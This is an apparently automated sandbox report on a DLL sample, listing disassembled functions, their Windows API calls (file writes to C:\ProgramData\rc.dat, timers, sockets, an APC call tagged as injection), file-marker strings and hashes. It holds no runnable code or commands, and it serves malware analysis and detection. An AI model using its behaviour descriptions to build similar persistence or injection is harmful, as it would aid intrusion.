SHGetSpecialFolderPathW.SHELL32(00000000,6CEB6BCB,00000023,00000000,?,?,?,?,?,?,6CEB6BCB,?), ref: 6CEB66F1
lstrcpyW.KERNEL32(C:\ProgramData\rc.dat,6CEB6BCB,?,?,?,?,?,?,6CEB6BCB,?), ref: 6CEB66FF
lstrcatW.KERNEL32(C:\ProgramData\rc.dat,\ts.dat,?,?,?,?,?,?,6CEB6BCB,?), ref: 6CEB670F
CreateFileW.KERNELBASE(C:\ProgramData\rc.dat,80000000,00000000,00000000,00000003,00000020,00000000,?,?,?,?,?,?,6CEB6BCB,?), ref: 6CEB6729
ReadFile.KERNELBASE(000000FF,?,00000008,?,00000000,?,?,?,?,?,?,6CEB6BCB), ref: 6CEB6747
CloseHandle.KERNELBASE(000000FF,?,?,?,?,?,?,6CEB6BCB), ref: 6CEB6750

Part of subcall function 6CEB60CA: _malloc.LIBCMT ref: 6CEB60DE

CreateFileW.KERNEL32(C:\ProgramData\rc.dat,40000000,00000000,00000000,00000002,00000022,00000000,?,?,?,?,?,?,6CEB6BCB), ref: 6CEB6793
WriteFile.KERNEL32(000000FF,?,00000008,?,00000000,?,?,?,?,?,?,6CEB6BCB), ref: 6CEB67B1
CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,6CEB6BCB), ref: 6CEB67BA

Strings

C:\ProgramData\rc.dat, xrefs: 6CEB66DB, 6CEB66FA, 6CEB670A, 6CEB6724
\ts.dat, xrefs: 6CEB6705

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandle$FolderPathReadSpecialWrite_malloclstrcatlstrcpy
String ID: C:\ProgramData\rc.dat$\ts.dat
API String ID: 2169994954-2903805982
Opcode ID: 68739f70d899f97a76c7cff930f842e8e42ade5370f34219789ee90bb9df455f
Instruction ID: 3dbbd8d8f77b30ce77bde4d6e8ad9d3b19a60e5bb093598c30239a85698fdf1b
Opcode Fuzzy Hash: 68739f70d899f97a76c7cff930f842e8e42ade5370f34219789ee90bb9df455f
Instruction Fuzzy Hash: 8E118C76680208FBEB94DBE0CD0AFAD7B38EB09744F204554F721FA5D0DA7156019B11

Function 6CEB24DF Relevance: 10.6, APIs: 7, Instructions: 118
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedExchange.KERNEL32(?,00000001), ref: 6CEB2508
SetWaitableTimer.KERNELBASE(?,?,00000001,00000000,00000000,00000000), ref: 6CEB2539
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 6CEB2544
GetQueuedCompletionStatus.KERNEL32(?,?,?,000001F4,000001F4,?), ref: 6CEB25B3
InterlockedDecrement.KERNEL32(?), ref: 6CEB25C0
InterlockedDecrement.KERNEL32(?), ref: 6CEB25DB
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 6CEB2607

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
String ID:
API String ID: 1171374749-0
Opcode ID: 1f724e57d7c94a5f6688032d3ee13f680fc1a80973b2078fd825343153bbb10b
Instruction ID: 0fd6d35e9bac2626094c0a621242671425161903d3f7cd3e6e6e0dec4a9f6765
Opcode Fuzzy Hash: 1f724e57d7c94a5f6688032d3ee13f680fc1a80973b2078fd825343153bbb10b
Instruction Fuzzy Hash: 18414C711047429FC710DF21CA9896BB7F8FF99758F100A2EB496A3790DB34EA09CB52

Function 6CEB2ACD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 6CEB2AD2
CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 6CEB2B04
GetLastError.KERNEL32 ref: 6CEB2B11

Part of subcall function 6CEB1A0E: __EH_prolog.LIBCMT ref: 6CEB1A13

SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 6CEB2B4B

Strings

timer, xrefs: 6CEB2B1E

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: H_prologTimerWaitable$CreateErrorLast
String ID: timer
API String ID: 1421927452-1792073242
Opcode ID: 5c06ab03ce291bc743774ea213a9363152af039ef7beb8ce997da37622310349
Instruction ID: 9283567fd885c832f03458ca249dbc1a3efa8866c541dcc90a612511561ae611
Opcode Fuzzy Hash: 5c06ab03ce291bc743774ea213a9363152af039ef7beb8ce997da37622310349
Instruction Fuzzy Hash: BF2137B1A0060AEFDB04DFB5C9859AEF778FF15358B20416EE515A7B40DB309E05CBA1

Function 6CEB2F6A Relevance: 7.6, APIs: 5, Instructions: 95
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASetLastError.WS2_32(00000000,?,6CEF14BC,?,?,00000000,00000000), ref: 6CEB2FBD
closesocket.WS2_32(?), ref: 6CEB2FC5
ioctlsocket.WS2_32(?,8004667E,00000000), ref: 6CEB3023
WSASetLastError.WS2_32(00000000), ref: 6CEB3031
closesocket.WS2_32(?), ref: 6CEB3039

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ErrorLastclosesocket$ioctlsocket
String ID:
API String ID: 1561005644-0
Opcode ID: e661a85db928f8a584ceb6c8f27d353ed260694d2c4b5ad4929bd07e50557eef
Instruction ID: 762155818a59ec080967556467004fb9f36ab9940a0485ffb766afa995c7467c
Opcode Fuzzy Hash: e661a85db928f8a584ceb6c8f27d353ed260694d2c4b5ad4929bd07e50557eef
Instruction Fuzzy Hash: 8F31B372A00608AFDB00DBA5CD85BBEB7B9EF04328F300559F525E7681DB34A904CB50

Function 6CEB201D Relevance: 7.5, APIs: 5, Instructions: 34
synchronizationthreadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 6CEB203B
CloseHandle.KERNEL32(?), ref: 6CEB2044

Part of subcall function 6CEB8CEA: InterlockedExchangeAdd.KERNEL32(6CEF14D4,00000000), ref: 6CEB8CF5

TerminateThread.KERNEL32(?,00000000), ref: 6CEB2058
QueueUserAPC.KERNELBASE(Function_00001631,?,00000000), ref: 6CEB2065
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CEB2070

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
String ID:
API String ID: 1946104331-0
Opcode ID: eb34f3ecc8176454b0c902c2ecc5c45246b43e77a52d1637e4571ecaa010c9f5
Instruction ID: 3d72680eb2064c7c502750b86edb8edd9f0fb743374e52595c0ac7bad563716d
Opcode Fuzzy Hash: eb34f3ecc8176454b0c902c2ecc5c45246b43e77a52d1637e4571ecaa010c9f5
Instruction Fuzzy Hash: 1CF03631604205FFDF909F94DD09FA97BB8EF0A761F204659F56AA26D0DB7168009B60

Function 6CEB3135 Relevance: 6.1, APIs: 4, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

